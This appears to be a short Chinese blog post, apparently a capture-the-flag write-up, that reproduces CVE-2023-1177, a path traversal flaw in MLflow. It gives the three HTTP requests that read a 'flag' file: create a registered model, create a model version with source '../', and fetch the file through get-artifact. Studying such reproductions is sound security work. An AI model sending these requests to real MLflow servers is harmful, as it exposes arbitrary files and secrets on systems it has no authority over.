CVE-2023-1177

CVE-2023-1177复现
image

进入网站
image

使用bp抓包,构造poc

POST /ajax-api/2.0/mlflow/registered-models/create
Content-Type: application/json

{"name": "testfile"}

image

构造要查看的文件的poc

POST /ajax-api/2.0/mlflow/model-versions/create
Content-Type: application/json

{"name": "testfile", "source": "../"}

image

查看flag/model-versions/get-artifact?path=flag&name=testfile&version=1
其中path就是你要查看的文件,name就是你构造的文件路径
image

posted @ 2026-02-15 05:34  大雪深埋  阅读(30)  评论(0)    收藏  举报
// 正常配置 window.cnblogsConfig = { links: {}, }; // 友链页配置 window.cnblogsConfig.links.page = [ { title: '友情链接', // 标题 icon: 'icon-lianjie', // iconfont style: 'color: #a78bfa;', links: [ { name: '2_haowen_V', // 昵称 introduction: 'IT技术类博客', // 简介 avatar: 'https://pic.cnblogs.com/face/1334215/20180504110551.png', // 头像 url: 'https://www.hehaowen.com.cn/' // 友链地址 }, ] }, ];